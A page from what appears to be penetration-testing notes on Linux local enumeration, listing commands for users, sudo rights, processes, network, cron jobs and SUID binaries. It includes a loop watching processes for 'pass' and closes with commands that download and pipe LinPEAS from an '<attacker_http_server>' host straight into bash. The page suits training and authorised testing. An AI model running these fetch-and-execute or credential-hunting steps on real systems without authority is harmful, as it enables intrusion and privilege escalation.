Local Enumeration

Users

Enumerate the current user ID (UID), group ID (GID), and the groups the user belongs to.

id
uid=1001(john) gid=1001(john) groups=1001(john),27(sudo) # john's result

Enumerate basic information of all users using /etc/passwd.

cat /etc/passwd

The following example describes a line of /etc/passwd file.

john:x:1001:1001:John Doe:/home/john:/bin/bash
username:password:uid:gid:gecos:home directory:shell

  • Username: The login name (1-32 characters).

  • Password: An x means the password is stored in /etc/shadow.

  • User ID (UID): Unique ID for the user. UID 0 is for root, 1-99 are reserved, and 100-999 are for system accounts.

  • Group ID (GID): The primary group ID, found in /etc/group.

  • User Info (GECOS): Optional user information like full name or contact info.

  • Home Directory: The user's default directory when logging in.

  • Shell: The user's default shell, like /bin/bash, or /sbin/nologin to prevent login.

System information

Enumerate hostname.

hostname

Enumerate operating system version.

cat /etc/issue
cat /etc/os-release

Enumerate kernel version and architecture.

uname -a

User configurations

list sudoer capabilities of current user.

sudo -l

List environment variables.

env

List config files such as bash profile.

ls -la <home_directory>

Processes

Enumerate all processes in a user readable format.

ps aux

Monitor Processes.

watch -n 1 "ps -aux | grep pass"

It also possible to monitor running processes at live time using pspy tool.

Network

Enumerate all network interfaces, this includes physical and virtual networks.

ip a
ifconfig

Display the routing tables.

route

Enumerate connections.

ss -anp
netstat -tulnp

Enumerate firewall rules.

cat /etc/iptables/rules.v4

Scheduled tasks

Scheduled tasks in Linux also known as "Cron Jobs" and configured using the crontab command-line tool.

Crontab Files

  • User-specific crontabs: Stored separately for each user and managed by the crontab command.

  • System-wide crontab: Found in /etc/crontab. This file allows specifying jobs for different users.

  • Cron directories:

    • /etc/cron.hourly: Tasks that run every hour.

    • /etc/cron.daily: Tasks that run daily.

    • /etc/cron.weekly: Tasks that run weekly.

    • /etc/cron.monthly: Tasks that run monthly.

Listing tasks files.

ls -lah /etc/cron*

Find tasks in the system logs.

grep "CRON" /var/log/syslog

Enumerate the current user's scheduled jobs.

crontab -l

Application

Listing installed applications.

dpkg -l

File System

List all drives at boot time.

cat /tec/fstab

List all mounted file systems.

mount

List all available disks.

lsblk

Enumerate loaded Kernel modules.

lsmod

Gather more information about the kernel module.

/sbin/modinfo <module>

SUID Binaries

Enumerate SUID binaries.

find / -perm /4000 -type f 2>/dev/null

Automated Enumeration

Download and execute LinPEAS or unix-privesc-check:

# LinPEAS
curl -L http://<attacker_http_server>/linpeas.sh | bash 

# unix-privesc-check
wget http://<attacker_http_server>/unix-privesc-check && chmod +x unix-privesc-check && ./unix-privesc-check <standard | detailed>
PreviousSNMPNextLocal Privileges Escalation

Last updated